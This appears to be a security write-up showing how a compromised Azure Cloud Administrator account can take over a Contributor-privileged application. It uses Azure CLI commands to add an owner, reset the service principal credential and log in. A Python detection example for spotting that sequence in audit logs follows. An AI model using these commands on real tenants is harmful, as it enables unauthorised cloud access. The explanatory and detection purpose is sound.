Abusing Cloud Administrator Role
In this section we'll tackle an attack scenario in which we have compromised a Cloud Administrator account and want access to an application we don't otherwise have access to. This application holds the Contributor RBAC role on the subscription, so we'll end up assigning ourselves as an owner of the app, resetting its service principal credential and logging in with the newly-set password.
The first step of the attack is adding ourselves as an Application Owner; this can be done with the Azure CLI:
PS /home/otter> az ad app owner add --id <application_id> --owner-object-id <user_id>
# we can confirm the changes by listing all the owners of the application
PS /home/otter> az ad app owner list --id <application_id>
Now we can reset the password of the Service Principal account:
PS /home/otter> az ad sp credential reset --id <application_id>
This command returns a JSON object of this format:
{
"appId": "<application_id>",
"password": "<new_service_principal_password>",
"tenant": "<tenant_id>"
}
With the SP password we are able to log in to the tenant as the SP via single-factor authentication:
PS /home/otter> az login --service-principal -u <application_id> -p <new_service_principal_password> --tenant <tenant_id>
In short: once we compromise a Cloud Administrator account, we control every application in the tenant that has the Contributor RBAC role assigned to it.
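The three steps above leave a recognisable trail in the Azure AD audit log: an owner-add on the application followed shortly by a credential reset on the same application by the same initiator, and then a service-principal sign-in. The Python below is an added detection example written for this page, not code from the original write-up. The audit records are constructed; their field names follow the Microsoft Graph directoryAudit schema (activityDisplayName, initiatedBy, targetResources, activityDateTime), while the activity-name strings, the user principal names, the app ids and the CONTRIBUTOR_APPS set are assumptions to be checked against your own tenant's export.

```python
"""Correlate owner-add and credential-reset audit events on the same app.

Added example for this page. SAMPLE_AUDIT_LOG is constructed; the activity
names below are assumptions modelled on Azure AD audit log naming.
"""
import json
from datetime import datetime, timedelta

# Activity names as assumed to appear in the Azure AD audit log.
OWNER_ADDED = "Add owner to application"
CREDENTIAL_RESET = "Update application – Certificates and secrets management"

# Assumption: app ids that hold Contributor on a subscription (constructed).
CONTRIBUTOR_APPS = {"app-2222"}

# Constructed sample export: one benign owner-add, one attacker sequence,
# and one credential reset that falls outside the correlation window.
SAMPLE_AUDIT_LOG = json.dumps([
    {   # benign: an admin adds an owner and nothing follows
        "activityDateTime": "2024-05-01T09:00:00+00:00",
        "activityDisplayName": OWNER_ADDED,
        "initiatedBy": {"user": {"userPrincipalName": "admin@contoso.example"}},
        "targetResources": [{"id": "app-1111", "type": "Application"}],
    },
    {   # compromised account adds itself as owner of app-2222 ...
        "activityDateTime": "2024-05-01T10:00:00+00:00",
        "activityDisplayName": OWNER_ADDED,
        "initiatedBy": {"user": {"userPrincipalName": "otter@contoso.example"}},
        "targetResources": [{"id": "app-2222", "type": "Application"}],
    },
    {   # ... and resets that app's credentials five minutes later
        "activityDateTime": "2024-05-01T10:05:00+00:00",
        "activityDisplayName": CREDENTIAL_RESET,
        "initiatedBy": {"user": {"userPrincipalName": "otter@contoso.example"}},
        "targetResources": [{"id": "app-2222", "type": "Application"}],
    },
    {   # a reset a day after the owner-add: outside the 30-minute window
        "activityDateTime": "2024-05-02T09:00:00+00:00",
        "activityDisplayName": CREDENTIAL_RESET,
        "initiatedBy": {"user": {"userPrincipalName": "admin@contoso.example"}},
        "targetResources": [{"id": "app-1111", "type": "Application"}],
    },
])


def parse_records(raw_json):
    """Flatten the export into (time, actor, activity, app_id) tuples, by time."""
    events = []
    for rec in json.loads(raw_json):
        when = datetime.fromisoformat(rec["activityDateTime"])
        actor = (rec.get("initiatedBy", {}).get("user", {})
                 .get("userPrincipalName", "<unknown>"))
        app_id = next((t["id"] for t in rec.get("targetResources", [])
                       if t.get("type") == "Application"), None)
        events.append((when, actor, rec["activityDisplayName"], app_id))
    return sorted(events, key=lambda e: e[0])


def find_owner_then_reset(raw_json, window_minutes=30):
    """Alert when one actor adds an owner to an app and then resets that
    app's credentials within window_minutes (the sequence on this page)."""
    window = timedelta(minutes=window_minutes)
    events = parse_records(raw_json)
    alerts = []
    for i, (t_add, actor, activity, app_id) in enumerate(events):
        if activity != OWNER_ADDED or app_id is None:
            continue
        for t_reset, actor2, activity2, app2 in events[i + 1:]:
            if t_reset - t_add > window:
                break  # events are time-sorted, nothing later can match
            if activity2 == CREDENTIAL_RESET and actor2 == actor and app2 == app_id:
                alerts.append({"actor": actor, "app_id": app_id,
                               "owner_added_at": t_add.isoformat(),
                               "credential_reset_at": t_reset.isoformat()})
                break
    return alerts


def find_privileged_resets(raw_json, privileged_apps=CONTRIBUTOR_APPS):
    """Flag any credential reset on an app known to hold Contributor,
    regardless of whether an owner-add preceded it."""
    return [{"actor": actor, "app_id": app_id, "at": when.isoformat()}
            for when, actor, activity, app_id in parse_records(raw_json)
            if activity == CREDENTIAL_RESET and app_id in privileged_apps]


if __name__ == "__main__":
    print(json.dumps(find_owner_then_reset(SAMPLE_AUDIT_LOG), indent=2))
    print(json.dumps(find_privileged_resets(SAMPLE_AUDIT_LOG), indent=2))
```

The first function catches the exact sequence from this page; the second is the broader control, since a Cloud Administrator can reset an application's credential without first taking ownership, so any credential reset on an app that holds Contributor deserves review on its own. Feed it a real Graph directoryAudit export after confirming the activity names match what your tenant records.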